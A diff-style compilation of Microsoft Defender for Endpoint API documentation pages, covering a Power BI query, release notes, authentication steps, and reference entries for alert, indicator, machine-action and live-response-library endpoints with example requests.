- { "Int32", Int32.Type },
- { "Int16", Int16.Type },
- { "UInt64", Number.Type },
- { "UInt32", Number.Type },
- { "UInt16", Number.Type },
- { "Byte", Byte.Type },
- { "Single", Single.Type },
- { "Decimal", Decimal.Type },
- { "TimeSpan", Duration.Type },
- { "DateTime", DateTimeZone.Type },
- { "String", Text.Type },
- { "Boolean", Logical.Type },
- { "SByte", Logical.Type },
- { "Guid", Text.Type }
- }),
-
- Schema = Table.FromRecords(Response[Schema]),
- TypedSchema = Table.Join(Table.SelectColumns(Schema, {"Name", "Type"}), {"Type"}, TypeMap , {"Type"}),
- Results = Response[Results],
- Rows = Table.FromRecords(Results, Schema[Name]),
- Table = Table.TransformColumnTypes(Rows, Table.ToList(TypedSchema, (c) => {c{0}, c{2}}))
-
- in Table
- ```
-
-5. Select **Done**.
-
-6. Select **Edit Credentials**.
-
- :::image type="content" source="../media/power-bi-edit-credentials.png" alt-text="The Edit Credentials menu item" lightbox="../media/power-bi-edit-credentials.png":::
-
-7. Select **Organizational account** \> **Sign in**.
-
- :::image type="content" source="../media/power-bi-set-credentials-organizational.png" alt-text="The Sign in option in the Organizational account menu item" lightbox="../media/power-bi-set-credentials-organizational.png":::
-
-8. Enter your credentials and wait to be signed in.
-
-9. Select **Connect**.
-
- :::image type="content" source="../media/power-bi-set-credentials-organizational-cont.png" alt-text="The sign-in confirmation message in the Organizational account menu item" lightbox="../media/power-bi-set-credentials-organizational-cont.png":::
-
-Now the results of your query appear as a table and you can start to build visualizations on top of it!
-
-You can duplicate this table, rename it, and edit the Advanced Hunting query inside to get any data you would like.
-
-## Connect Power BI to OData APIs
-
-The only difference from the previous example is the query inside the editor. Follow steps 1-3 above.
-
-At step 4, instead of the code in that example, copy the following code, and paste it in the editor to pull all **Machine Actions** from your organization:
-
-```
- let
-
- Query = "MachineActions",
-
- Source = OData.Feed("https://api.securitycenter.microsoft.com/api/" & Query, null, [Implementation="2.0", MoreColumns=true])
- in
- Source
-```
-
-You can do the same for **Alerts** and **Machines**.
-You also can use OData queries for queries filters. See [Using OData Queries](exposed-apis-odata-samples.md).
-
-## Power BI dashboard samples in GitHub
-
-For more information, see the [Power BI report templates](https://github.com/microsoft/MicrosoftDefenderATP-PowerBI).
-
-## Sample reports
-
-View the Microsoft Defender for Endpoint Power BI report samples. For more information, see [Browse code samples](/samples/browse/?products=mdatp).
-
-## Related articles
--- [Defender for Endpoint APIs](apis-intro.md)-- [Advanced Hunting API](run-advanced-query-api.md)-- [Using OData Queries](exposed-apis-odata-samples.md)-
security Api Release Notes https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/api-release-notes.md
- Title: Microsoft Defender for Endpoint API release notes
-description: Release notes for updates made to the Microsoft Defender for Endpoint set of APIs.
-------- m365-security-- tier3-- must-keep-- Previously updated : 02/02/2021--
-# Microsoft Defender for Endpoint API release notes
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-The following information lists the updates made to the Microsoft Defender for Endpoint APIs and the dates they were made.
-
-## Release notes - newest to oldest (dd.mm.yyyy)
-
-### 08.08.2022
--- Added new Export Device Health API method - GET /api/public/avdeviceshealth [Export device health methods and properties](device-health-api-methods-properties.md)-
-### 06.10.2021
--- Added new Export assessment API method - _Delta Export software vulnerabilities assessment (JSON response)_ [Export assessment methods and properties per device](get-assessment-methods-properties.md).-
-### 25.05.2021
--- Added new API [Export assessment methods and properties per device](get-assessment-methods-properties.md).-
-### 03.05.2021
--- Added new API: [Remediation activity methods and properties](get-remediation-methods-properties.md).-
-### 10.02.2021
--- Added new API: [Batch update alerts](batch-update-alerts.md).-
-### 25.01.2021
--- Updated rate limitations for [Advanced Hunting API](run-advanced-query-api.md) from 15 to 45 requests per minute.-
-### 21.01.2021
--- Added new API: [Find devices by tag](../machine-tags.md).-- Added new API: [Import Indicators](import-ti-indicators.md).-
-### 03.01.2021
--- Updated Alert evidence: added ***detectionStatus***, ***parentProcessFilePath*** and ***parentProcessFileName*** properties.-- Updated [Alert entity](alerts.md): added ***detectorId*** property.-
-### 15.12.2020
--- Updated [Device](machine.md) entity: added ***IpInterfaces*** list. See [List devices](get-machines.md).-
-### 04.11.2020
--- Added new API: [Set device value](set-device-value.md).-- Updated [Device](machine.md) entity: added ***deviceValue*** property.-
-### 01.09.2020
--- Added option to expand the Alert entity with its related Evidence. See [List Alerts](get-alerts.md).
security Apis Intro https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/apis-intro.md
- Title: Access the Microsoft Defender for Endpoint APIs-
-description: Learn how you can use APIs to automate workflows and innovate based on Microsoft Defender for Endpoint capabilities
---- Previously updated : 01/25/2022---- m365-security-- tier3-- must-keep----
-# Access the Microsoft Defender for Endpoint APIs
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Business](../../defender-business/index.yml)-
-> [!IMPORTANT]
-> Advanced hunting capabilities are not included in Defender for Business.
-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Defender for Endpoint exposes much of its data and actions through a set of programmatic APIs. Those APIs will enable you to automate workflows and innovate based on Defender for Endpoint capabilities. The API access requires OAuth2.0 authentication. For more information, see [OAuth 2.0 Authorization Code Flow](/azure/active-directory/develop/active-directory-v2-protocols-oauth-code).
-
-Watch this video for a quick overview of Defender for Endpoint's APIs.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4d73M]
-
-In general, you'll need to take the following steps to use the APIs:
--- Create a [Microsoft Entra application](/microsoft-365/security/defender-endpoint/exposed-apis-create-app-nativeapp)-- Get an access token using this application-- Use the token to access Defender for Endpoint API-
-You can access Defender for Endpoint API with **Application Context** or **User Context**.
--- **Application Context: (Recommended)**-
- Used by apps that run without a signed-in user present. for example, apps that run as background services or daemons.
-
- Steps that need to be taken to access Defender for Endpoint API with application context:
-
- 1. Create a Microsoft Entra Web-Application.
- 2. Assign the desired permission to the application, for example, 'Read Alerts', 'Isolate Machines'.
- 3. Create a key for this Application.
- 4. Get token using the application with its key.
- 5. Use the token to access the Microsoft Defender for Endpoint API
-
- For more information, see [Get access with application context](exposed-apis-create-app-webapp.md).
--- **User Context:**-
- Used to perform actions in the API on behalf of a user.
-
- Steps to take to access Defender for Endpoint API with user context:
-
- 1. Create Microsoft Entra Native-Application.
- 2. Assign the desired permission to the application, e.g 'Read Alerts', 'Isolate Machines' etc.
- 3. Get token using the application with user credentials.
- 4. Use the token to access the Microsoft Defender for Endpoint API
-
- For more information, see [Get access with user context](exposed-apis-create-app-nativeapp.md).
--
->[!TIP]
->When more than one query request is required to retrieve all the results, Microsoft Graph returns an `@odata.nextLink` property in the response that contains a URL to the next page of results. For more information, see [Paging Microsoft Graph data in your app](/graph/paging).
--
-## Related topics
--- [Microsoft Defender for Endpoint APIs](exposed-apis-list.md)-- [Access Microsoft Defender for Endpoint with application context](exposed-apis-create-app-webapp.md)-- [Access Microsoft Defender for Endpoint with user context](exposed-apis-create-app-nativeapp.md)
security Batch Delete Ti Indicators https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/batch-delete-ti-indicators.md
- Title: Batch Delete Indicators API
-description: Learn how to use the Batch Delete Indicators API to delete indicator entities by ID in Microsoft Defender for Endpoint.
--------- m365-security-- tier3-- must-keep-- Previously updated : 07/31/2023--
-# Batch Delete Indicators
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Deletes [Indicator](ti-indicator.md) entities by ID.
-
-## Limitations
-
-Rate limitations for this API are 30 calls per minute and 1,500 calls per hour.
-
-Batch size limit of up to 500 [Indicator](ti-indicator.md) IDs.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Get started](apis-intro.md).
-
-| Permission type | Permission | Permission display name |
-||||
-| Application | Ti.ReadWrite | 'Read and write TI Indicators' |
-| Application | Ti.ReadWrite.All | 'Read and write Indicators' |
-
-## HTTP request
-
-```http
-POST https://api.securitycenter.microsoft.com/api/indicators/BatchDelete
-```
--
-## Request headers
-
-|Name|Type|Description|
-|:|:|:|
-|Authorization | String | Bearer {token}. **Required**.|
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-|Parameter|Type|Description|
-|:|:|:|
-|IndicatorIds|List *String* |A list of the IDs of the indicators to be removed. **Required**|
-
-## Response
-
-If Indicators all existed and were deleted successfully - 204 OK without content.
-
-If indicator IDs list is empty or exceeds size limit - 400 Bad Request.
-
-If any indicator ID is invalid - 400 Bad Request.
-
-If requestor isn't exposed to any indicator's device groups - 403 Forbidden.
-
-If any Indicator ID wasn't found - 404 Not Found.
-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/indicators/BatchDelete
-```
-
-```json
-{
- "IndicatorIds": [ "1", "2", "5" ]
-}
-```
security Batch Update Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/batch-update-alerts.md
- Title: Batch Update alert entities API
-description: Learn how to update Microsoft Defender for Endpoint alerts in a batch by using this API. You can update the status, determination, classification, and assignedTo properties.
-------- m365-security-- tier3-- must-keep-- Previously updated : 03/15/2021--
-# Batch update alerts
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Updates properties of a batch of existing [Alerts](alerts.md).
-
-Submission of **comment** is available with or without updating properties.
-
-Updatable properties are: `status`, `determination`, `classification` and `assignedTo`.
-
-## Limitations
-
-1. You can update alerts that are available in the API. For more information, see [List Alerts](get-alerts.md).
-2. Rate limitations for this API are 10 calls per minute and 500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type | Permission | Permission display name
-:|:|:
-Application | Alert.ReadWrite.All | 'Read and write all alerts'
-Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'Alerts investigation'. For more information, see [Create and manage roles](../user-roles.md).
-> - The user needs to have access to the device associated with the alert, based on device group settings. For more information, see [Create and manage device groups](../machine-groups.md).
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-POST /api/alerts/batchUpdate
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization | String | Bearer {token}. **Required**.
-Content-Type | String | application/json. **Required**.
-
-## Request body
-
-In the request body, supply the IDs of the alerts to be updated and the values of the relevant fields that you wish to update for these alerts.
-
-Existing properties that aren't included in the request body will maintain their previous values or be recalculated based on changes to other property values.
-
-For best performance you shouldn't include existing values that haven't changed.
-
-Property | Type | Description
-:|:|:
-alertIds | List&lt;String&gt;| A list of the IDs of the alerts to be updated. **Required**
-status | String | Specifies the updated status of the specified alerts. The property values are: 'New', 'InProgress' and 'Resolved'.
-assignedTo | String | Owner of the specified alerts
-classification | String | Specifies the specification of the specified alerts. The property values are: `TruePositive`, `Informational, expected activity`, and `FalsePositive`.
-determination | String | Specifies the determination of the specified alerts. <p>Possible determination values for each classification are: <br><li> <b>True positive</b>: `Multistage attack` (MultiStagedAttack), `Malicious user activity` (MaliciousUserActivity), `Compromised account` (CompromisedUser) ΓÇô consider changing the enum name in public api accordingly, `Malware` (Malware), `Phishing` (Phishing), `Unwanted software` (UnwantedSoftware), and `Other` (Other). <li> <b>Informational, expected activity:</b> `Security test` (SecurityTesting), `Line-of-business application` (LineOfBusinessApplication), `Confirmed activity` (ConfirmedUserActivity) - consider changing the enum name in public api accordingly, and `Other` (Other). <li> <b>False positive:</b> `Not malicious` (Clean) - consider changing the enum name in public api accordingly, `Not enough data to validate` (InsufficientData), and `Other` (Other).
-comment | String | Comment to be added to the specified alerts.
-
-> [!NOTE]
-> Around August 29, 2022, previously supported alert determination values ('Apt' and 'SecurityPersonnel') will be deprecated and no longer available via the API.
-
-## Response
-
-If successful, this method returns 200 OK, with an empty response body.
-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/alerts/batchUpdate
-```
-
-```json
-{
- "alertIds": ["da637399794050273582_760707377", "da637399989469816469_51697947354"],
- "status": "Resolved",
- "assignedTo": "secop2@contoso.com",
- "classification": "FalsePositive",
- "determination": "Malware",
- "comment": "Resolve my alert and assign to secop2"
-}
-```
security Cancel Machine Action https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/cancel-machine-action.md
- Title: Cancel machine action API
-description: Learn how to cancel an already launched machine action
---- NOCSH------ m365-security-- tier3-- must-keep-- Previously updated : 06/03/2021--
-# Cancel machine action API
--
-**Applies to:**
--- [ Microsoft Defender for Endpoint](../../defender/microsoft-365-security-center-mde.md)-- [Microsoft Defender for Endpoint Plan 1](/microsoft-365/security/defender-endpoint/defender-endpoint-plan-1)-- [Microsoft Defender for Endpoint Plan 2](/microsoft-365/security/defender-endpoint/defender-endpoint-plan-1)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Cancel an already launched machine action that isn't yet in final state (completed, canceled, failed).
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more,
-including how to choose permissions, see [Get started](apis-intro.md).
-
-|Permission type|Permission|Permission display name|
-||||
-|Application|Machine.CollectForensics <br> Machine.Isolate <br> Machine.RestrictExecution <br> Machine.Scan <br> Machine.Offboard <br> Machine.StopAndQuarantine <br> Machine.LiveResponse|Collect forensics <br>Isolate machine<br>Restrict code execution<br> Scan machine<br> Offboard machine<br> Stop And Quarantine<br> Run live response on a specific machine|
-|Delegated (work or school account)|Machine.CollectForensics<br> Machine.Isolate <br>Machine.RestrictExecution<br> Machine.Scan<br> Machine.Offboard<br> Machine.StopAndQuarantineMachine.LiveResponse|Collect forensics<br> Isolate machine<br> Restrict code execution<br> Scan machine<br>Offboard machine<br> Stop And Quarantine<br> Run live response on a specific machine|
-
-## HTTP request
-
-```http
-POST https://api.securitycenter.microsoft.com/api/machineactions/<machineactionid>/cancel
-```
-
-## Request headers
-
-|Name|Type|Description|
-||||
-|Authorization|String|Bearer {token}. Required.|
-|Content-Type|string|application/json. Required.|
-
-## Request body
-
-|Parameter|Type|Description|
-||||
-|Comment|String|Comment to associate with the cancellation action.|
-
-## Response
-
-If successful, this method returns 200, OK response code with a Machine Action entity. If machine action entity with the specified id wasn't found - 404 Not Found.
-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```HTTP
-POST
-https://api.securitycenter.microsoft.com/api/machineactions/988cc94e-7a8f-4b28-ab65-54970c5d5018/cancel
-```
-
-```JSON
-{
- "Comment": "Machine action was canceled by automation"
-}
-```
-
-## Related article
--- [Get machine action API](get-machineaction-object.md)
security Collect Investigation Package https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/collect-investigation-package.md
- Title: Collect investigation package API
-description: Use this API to create calls related to the collecting an investigation package from a device.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Collect investigation package API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Collect investigation package from a device.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-> [!IMPORTANT]
->
-> - These response actions are only available for devices on Windows 10, version 1703 or later, and on Windows 11.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.CollectForensics|'Collect forensics'
-Delegated (work or school account)|Machine.CollectForensics|'Collect forensics'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'Alerts Investigation' (See [Create and manage roles](../user-roles.md) for more information)
-> - The user needs to have access to the device, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-POST https://api.securitycenter.microsoft.com/api/machines/{id}/collectInvestigationPackage
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-Content-Type|string|application/json. **Required**.
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-Parameter|Type|Description
-:|:|:
-Comment|String|Comment to associate with the action. **Required**.
-
-## Response
-
-If successful, this method returns 201 - Created response code and [Machine Action](machineaction.md) in the response body. If a collection is already running, this returns 400 Bad Request.
-
-## Example
-
-### Request
-
-Here is an example of the request.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/machines/fb9ab6be3965095a09c057be7c90f0a2/collectInvestigationPackage
-```
-
-```json
-{
- "Comment": "Collect forensics due to alert 1234"
-}
-```
security Common Errors https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/common-errors.md
- Title: Common Microsoft Defender for Endpoint API errors
-description: List of common Microsoft Defender for Endpoint API errors with descriptions.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Handling REST API errors
--
-HTTP error responses are divided into two categories:
-* Client error (400-code level) ΓÇô the client sent an invalid request or the request isn't in accordance with definitions.
-* Server error (500-level) ΓÇô the server temporarily failed to fulfill the request or a server error occurred. Try sending the HTTP request again.
-
-The error codes listed in the following table may be returned by an operation on any of Microsoft Defender for Endpoint APIs.
-* In addition to the error code, every error response contains an error message, which can help resolve the problem.
-* The message is a free text that can be changed.
-* At the bottom of the page, you can find response examples.
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-Error code|HTTP status code|Message
-||
-BadRequest|BadRequest (400)|General Bad Request error message.
-ODataError|BadRequest (400)|Invalid OData URI query (the specific error is specified).
-InvalidInput|BadRequest (400)|Invalid input {the invalid input}.
-InvalidRequestBody|BadRequest (400)|Invalid request body.
-InvalidHashValue|BadRequest (400)|Hash value {the invalid hash} is invalid.
-InvalidDomainName|BadRequest (400)|Domain name {the invalid domain} is invalid.
-InvalidIpAddress|BadRequest (400)|IP address {the invalid IP} is invalid.
-InvalidUrl|BadRequest (400)|URL {the invalid URL} is invalid.
-MaximumBatchSizeExceeded|BadRequest (400)|Maximum batch size exceeded. Received: {batch size received}, allowed: {batch size allowed}.
-MissingRequiredParameter|BadRequest (400)|Parameter {the missing parameter} is missing.
-OsPlatformNotSupported|BadRequest (400)|OS Platform {the client OS Platform} isn't supported for this action.
-ClientVersionNotSupported|BadRequest (400)|{The requested action} is supported on client version {supported client version} and above.
-Unauthorized|Unauthorized (401)|Unauthorized (invalid or expired authorization header).
-Forbidden|Forbidden (403)|Forbidden (valid token but insufficient permission for the action).
-DisabledFeature|Forbidden (403)|Tenant feature isn't enabled.
-DisallowedOperation|Forbidden (403)|{the disallowed operation and the reason}.
-NotFound|Not Found (404)|General Not Found error message.
-ResourceNotFound|Not Found (404)|Resource {the requested resource} wasn't found.
-TooManyRequests|Too Many Requests (429)|Response represents reaching quota limit either by number of requests or by CPU.
-InternalServerError|Internal Server Error (500)|(No error message, retry the operation.)
-
-## Throttling
-The HTTP client may receive a 'Too Many Requests error (429)' when the number of HTTP requests in a given time frame exceeds the allowed number of calls per API.
-
-The HTTP client should delay resubmitting further HTTPS requests and then submit them in a way that complies with the rate limitations. A Retry-After in the response header indicating how long to wait (in seconds) before making a new request
-
-Ignoring the 429 response or trying to resubmit HTTP requests in a shorter time frame gives a return of the 429 error code.
-
-## Body parameters are case-sensitive
-
-The submitted body parameters are currently case-sensitive.
-
-If you experience an **InvalidRequestBody** or **MissingRequiredParameter** errors, it might be caused from a wrong parameter capital or lower-case letter.
-
-Review the API documentation page and check that the submitted parameters match the relevant example.
-
-## Correlation request ID
-
-Each error response contains a unique ID parameter for tracking.
-
-The property name of this parameter is "target".
-
-When contacting us about an error, attaching this ID helps find the root cause of the problem.
-
-## Examples
-
-```json
-{
- "error": {
- "code": "ResourceNotFound",
- "message": "Machine 123123123 was not found",
- "target": "43f4cb08-8fac-4b65-9db1-745c2ae65f3a"
- }
-}
-```
-
-```json
-{
- "error": {
- "code": "InvalidRequestBody",
- "message": "Request body is incorrect",
- "target": "1fa66c0f-18bd-4133-b378-36d76f3a2ba0"
- }
-}
-```
security Create Alert By Reference https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/create-alert-by-reference.md
- Title: Create alert from event API
-description: Learn how to use the Create alert API to create a new Alert on top of Event in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Create alert API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-## API description
-
-Creates new [Alert](alerts.md) on top of **Event**.
--- **Microsoft Defender for Endpoint Event** is required for the alert creation.-- You need to supply three parameters from the Event in the request: **Event Time**, **Machine ID**, and **Report ID**. See example below.-- You can use an event found in Advanced Hunting API or Portal.-- If there existing an open alert on the same Device with the same Title, the new created alert is merged with it.-- An automatic investigation starts automatically on alerts created via the API.-
-## Limitations
-
-1. Rate limitations for this API are 15 calls per minute.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md).
-
-Permission type | Permission | Permission display name
-:|:|:
-Application | Alert.ReadWrite.All | 'Read and write all alerts'
-Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: *Alerts investigation*. For more information, see [Create and manage roles](../user-roles.md).
-> - The user needs to have access to the device associated with the alert, based on device group settings. For more information, see [Create and manage device groups](../machine-groups.md).
->
-> Device Group creation is supported in both Defender for Endpoint Plan 1 and Plan 2
-
-## HTTP request
-
-```http
-POST https://api.securitycenter.microsoft.com/api/alerts/CreateAlertByReference
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization | String | Bearer {token}. **Required**.
-Content-Type | String | application/json. **Required**.
-
-## Request body
-
-In the request body, supply the following values (all are required):
-
-Property | Type | Description
-:|:|:
-eventTime | DateTime(UTC) | The precise time of the event as string, as obtained from advanced hunting. For example, ```2018-08-03T16:45:21.7115183Z``` **Required**.
-reportId | String | The reportId of the event, as obtained from advanced hunting. **Required**.
-machineId | String | Id of the device on which the event was identified. **Required**.
-severity | String | Severity of the alert. The property values are: 'Low', 'Medium' and 'High'. **Required**.
-title | String | Title for the alert. **Required**.
-description | String | Description of the alert. **Required**.
-recommendedAction| String | Security officer needs to take this action when analyzing the alert. **Required**.
-category| String | Category of the alert. The property values are: "General", "CommandAndControl", "Collection", "CredentialAccess", "DefenseEvasion", "Discovery", "Exfiltration", "Exploit", "Execution", "InitialAccess", "LateralMovement", "Malware", "Persistence", "PrivilegeEscalation", "Ransomware", "SuspiciousActivity" **Required**.
-
-## Response
-
-If successful, this method returns 200 OK, and a new [alert](alerts.md) object in the response body. If event with the specified properties (_reportId_, _eventTime_ and _machineId_) wasn't found - 404 Not Found.
-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/alerts/CreateAlertByReference
-```
-
-```json
-{
- "machineId": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
- "severity": "Low",
- "title": "example",
- "description": "example alert",
- "recommendedAction": "nothing",
- "eventTime": "2018-08-03T16:45:21.7115183Z",
- "reportId": "20776",
- "category": "Exploit"
-}
-```
security Delete Library https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/delete-library.md
- Title: Delete a file from the live response library
-description: Learn how to delete a file from the live response library.
--- NOCSH------ m365-security-- tier3-- must-keep--- Previously updated : 04/17/2024--
-# Delete a file from the live response library
--
-**Applies to:**
-- [Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://www.microsoft.com/microsoft-365/windows/microsoft-defender-atp?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Delete a file from live response library.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per
- hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more,
-including how to choose permissions, see [Get started](apis-intro.md).
-
-| Permission type | Permission | Permission display name |
-||-|--|
-| Application | Library.Manage | Manage live response library |
-| Delegated (work or school account) | Library.Manage | Manage live response library |
-
-## HTTP request
-
-DELETE https://api.security.microsoft.com/api/libraryfiles/{fileName}
-
-## Request headers
-
-| Name | Type | Description |
-|--|--||
-| Authorization | String | Bearer\<token>\. Required. |
-
-## Request body
-
-Empty
-
-## Response
--- If file exists in library and deleted successfully 204 No Content.--- If specified file name was not found 404 Not Found.-
-## Example
-
-Request
-
-Here is an example of the request.
-
-```HTTP
-DELETE https://api.security.microsoft.com/api/libraryfiles/script1.ps1
-```
-
-## Related topic
--- [Run live response](run-live-response.md)
security Delete Ti Indicator By Id https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/delete-ti-indicator-by-id.md
- Title: Delete Indicator API.
-description: Learn how to use the Delete Indicator API to delete an Indicator entity by ID in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Delete Indicator API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-## API description
-
-Deletes an [Indicator](ti-indicator.md) entity by ID.
-
-## Limitations
-
-Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.
-
-## Permissions
-
